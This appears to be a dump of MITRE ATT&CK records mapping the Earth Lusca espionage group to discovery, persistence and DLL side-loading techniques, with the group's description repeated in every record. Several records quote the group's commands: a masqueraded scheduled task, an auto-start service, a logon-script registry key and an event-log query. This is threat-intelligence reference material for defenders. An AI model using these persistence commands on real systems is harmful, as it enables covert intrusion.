external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command <code>powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -
property * | findstr “Address””</code> to find the network information of successfully logged-in accounts to discovery addresses of other machines. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used multiple scanning tools to discover other machines within the same compromised network.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--2bb7ed69-8f59-47f3-8d86-f1c1202c7629
revoked : False
technique : Remote System Discovery
technique_description : Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).

Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.

Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)  

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1018
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log “Microsoft-Windows-TerminalServices-RDPClient/Operational”
(Event ID 1024) to obtain network information from RDP connections. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used [netstat](https://attack.mitre.org/software/S0104) from a compromised system to obtain network connection information.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--def0dc1a-1c41-44f0-a076-36fb1b98390c
revoked : False
technique : System Network Connections Discovery
technique_description : Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1049
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Network']
data_sources : ['Process: OS API Execution', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has placed a malicious payload in `%WINDIR%\SYSTEM32\oci.dll` so it would be sideloaded by the MSDTC service.(Citation: TrendMicro EarthLusca 2022) 
relationship_id : relationship--7807639f-cc9f-4b0a-9f01-8161cbb1fd53
revoked : False
technique : DLL Side-Loading
technique_description : Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) modified the registry using the command <code>reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]”</code> for persistence.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--83aedf08-e8eb-4c18-80c1-727ddb0f1d07
revoked : False
technique : Modify Registry
technique_description : Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1112
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: OS API Execution', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Windows Registry: Windows Registry Key Deletion', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command <code>schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “[file path]” /ru system</code> for persistence.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6f1c0538-c9f4-49ad-b934-0714b50c1c45
revoked : False
technique : Scheduled Task/Job
technique_description : Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1053
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS', 'Containers']
data_sources : ['Scheduled Job: Scheduled Job Creation', 'File: File Creation', 'Process: Process Creation', 'Container: Container Creation', 'Command: Command Execution', 'File: File Modification']
permissions_required : ['Administrator', 'SYSTEM', 'User']
effective_permissions : ['SYSTEM', 'Administrator', 'User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) created a service using the command <code>sc create “SysUpdate” binpath= “cmd /c start “[file path]””&&sc config “SysUpdate” start= auto&&net
start SysUpdate</code> for persistence.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--cd85a2d6-ebee-4ebd-9571-5cafcac15b05
revoked : False
technique : Windows Service
technique_description : Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. 

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1543.003
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Command: Command Execution', 'File: File Metadata', 'Windows Registry: Windows Registry Key Creation', 'Driver: Driver Load', 'Service: Service Modification', 'Process: OS API Execution']
effective_permissions : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command <code>ipconfig</code> to obtain information about network configurations.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--e13ab711-012c-4405-87ae-f096d770e367
revoked : False
technique : System Network Configuration Discovery
technique_description : Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1016
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'Script: Script Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
